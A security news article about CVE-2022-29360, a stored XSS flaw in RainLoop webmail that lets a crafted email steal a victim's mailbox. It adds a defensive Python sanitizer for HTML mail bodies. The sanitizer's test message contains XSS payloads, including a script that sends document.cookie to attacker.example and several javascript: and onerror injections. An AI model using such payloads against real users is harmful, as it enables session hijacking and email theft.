Unpatched Bug in RainLoop Webmail Could Give Hackers Access to all Emails
An unpatched high-severity security flaw has been disclosed in the open-source RainLoop web-based email client that could be weaponized to siphon emails from victims' inboxes.
"The code vulnerability can be easily exploited by an attacker by sending a malicious email to a victim that uses RainLoop as a mail client," SonarSource security researcher Simon Scannell said in a report published this week.
Tracked as CVE-2022-29360, the flaw is a stored cross-site scripting (XSS) vulnerability in the email viewer, and it affects the latest release of RainLoop, which dates from May 7, 2021.
The flaw affects every RainLoop installation running its default configuration. The attack takes the form of a specially crafted email: when the victim opens it in the RainLoop viewer, the JavaScript payload it carries executes in the victim's browser, with no further user interaction required. Because that script runs in the origin of the webmail application, it inherits the victim's authenticated session and can read and exfiltrate the rest of the mailbox.
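The attack described above works because the email viewer renders attacker-supplied HTML without adequate sanitization. As an added example (this is not RainLoop's or SnappyMail's code, and it does not reproduce the specific bug SonarSource found), here is an allowlist-based sanitizer for HTML mail bodies, written in Python on top of the standard library's html.parser tokenizer and run over a constructed message. It drops script and style content, inline event handlers, style attributes and javascript:/data: URLs, and keeps benign markup and text. The tag and attribute allowlists, the sample mail and the attacker.example/example.com hosts are assumptions made for the example; the library names in the docstring are the author's suggestions, not something the article mentions.

```python
"""Allowlist-based sanitizer for HTML email bodies.

Added illustrative example only: this is not RainLoop's or SnappyMail's
code. It uses the standard-library tokenizer html.parser; a real webmail
client should rely on a maintained sanitizer (e.g. DOMPurify or bleach)
plus a strict Content-Security-Policy rather than on a hand-rolled one.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allowlists for the example; a real client would tune these.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a", "ul", "ol",
                "li", "blockquote", "div", "span", "table", "tr", "td",
                "th", "img"}
VOID_TAGS = {"br", "img"}
# Per-tag attribute allowlist; everything else (style, on* handlers, ...) is dropped.
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "width", "height"}}
SAFE_URL_SCHEMES = {"http", "https", "mailto"}
# Elements whose entire content is discarded, not just the tag itself.
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object", "embed", "svg", "math"}


def safe_url(value: str) -> bool:
    """True for relative URLs and http/https/mailto; False for javascript:,
    data:, vbscript: and any other scheme. Control characters and whitespace
    are removed first because browsers ignore them when parsing the scheme."""
    cleaned = "".join(ch for ch in value if ord(ch) > 0x20)
    scheme = urlparse(cleaned).scheme.lower()
    return scheme == "" or scheme in SAFE_URL_SCHEMES


class EmailHtmlSanitizer(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)  # &#106;avascript: arrives decoded
        self.out: list[str] = []
        self._open: list[str] = []  # allowed tags currently open in the output
        self._drop: list[str] = []  # drop-content tags currently open in the input

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self._drop.append(tag)
            return
        if self._drop or tag not in ALLOWED_TAGS:
            return  # unknown tag: strip the tag but keep its text content
        clean = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            value = value or ""
            if name in ("href", "src") and not safe_url(value):
                continue
            clean.append(f' {name}="{escape(value, quote=True)}"')
        if tag == "a":
            clean.append(' rel="noopener noreferrer" target="_blank"')
        self.out.append(f"<{tag}{''.join(clean)}>")
        if tag not in VOID_TAGS:
            self._open.append(tag)

    def handle_startendtag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            return  # self-closed, so there is no content to discard
        self.handle_starttag(tag, attrs)
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if self._drop:
            if tag in self._drop:
                while self._drop.pop() != tag:
                    pass
            return
        if tag in self._open:
            while True:  # close anything left open inside it, then the tag itself
                top = self._open.pop()
                self.out.append(f"</{top}>")
                if top == tag:
                    break

    def handle_data(self, data):
        if not self._drop:
            self.out.append(escape(data, quote=False))

    # Comments, processing instructions and declarations are dropped by
    # HTMLParser's default no-op handlers.

    def result(self) -> str:
        self.close()
        while self._open:  # close tags the message left open
            self.out.append(f"</{self._open.pop()}>")
        return "".join(self.out)


def sanitize_email_html(body: str) -> str:
    parser = EmailHtmlSanitizer()
    parser.feed(body)
    return parser.result()


# Constructed sample message body for the example, not a real exploit.
CONSTRUCTED_MAIL = (
    "<p>Hi,</p>"
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
    '<img src="x" onerror="alert(document.domain)">'
    '<a href="JavaScript:alert(1)">invoice</a>'
    '<a href="https://example.com/inv/42">real invoice</a>'
    '<div style="background:url(javascript:alert(1))">Regards'  # left unclosed
)

if __name__ == "__main__":
    print(sanitize_email_html(CONSTRUCTED_MAIL))
```

Running the block prints the surviving markup: the paragraph, the image without its onerror handler, the first link without its javascript: href, the real link with rel/target added, and the div without its style, closed at the end even though the message never closed it. The two design points worth noting are that the parser re-emits only what is on the allowlist (so a new dangerous attribute or tag is rejected by default rather than needing a new denylist entry), and that URL scheme checks run after entity decoding and control-character stripping, which is where many hand-written filters fail.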
In its disclosure timeline, SonarSource said that it notified the RainLoop maintainers of the bug on November 30, 2021, and that no fix had been issued more than four months later.
In the absence of a patch, SonarSource recommends that users migrate to SnappyMail, a RainLoop fork that is actively maintained and not affected by the issue.
News URL
https://thehackernews.com/2022/04/unpatched-bug-in-rainloop-webmail-could.html
Related Vulnerability
| DATE | CVE | VULNERABILITY TITLE | RISK (CVSS base score) |
|---|---|---|---|
| 2022-07-28 | CVE-2022-29360 | Cross-site scripting vulnerability in RainLoop Webmail: the Email Viewer in RainLoop through 1.6.0 allows XSS via a crafted email message. | 5.4 |